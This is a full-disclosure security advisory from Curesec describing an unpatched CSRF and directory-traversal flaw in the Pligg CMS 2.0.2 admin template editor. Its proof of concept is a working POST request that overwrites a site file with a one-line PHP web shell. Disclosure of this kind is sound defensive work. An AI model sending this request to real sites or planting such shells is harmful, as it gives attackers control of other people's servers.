Pligg CMS 2.0.2 CSRF / Code Execution

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: Pligg CMS 2.0.2  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: http://pligg.com/  
Vulnerability Type: Code Execution & CSRF  
Remote Exploitable: Yes  
Reported to vendor: 09/01/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
The file editor provides the possibility to edit .tpl files stored in the  
templates directory.  
  
But the file editor is vulnerable to directory traversal when saving files, and  
it does not check the submitted filename against a whitelist of allowed files.  
It also does not check the file extension. Because of this, it is possible to  
gain code execution.  
  
Admin credentials are required to access the file editor, but the request does  
not have CSRF protection, so an attacker can gain code execution by getting the  
admin to visit a website they control while logged in.  
  
3. Proof of Concept  
  
  
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1  
  
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
09/01/2015 Informed Vendor about Issue (no reply)  
09/22/2015 Reminded Vendor of disclosure date  
09/22/2015 Vendor replied, issue has been send to staff  
09/29/2015 Reminded Vendor of disclosure date (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html  
  
  
`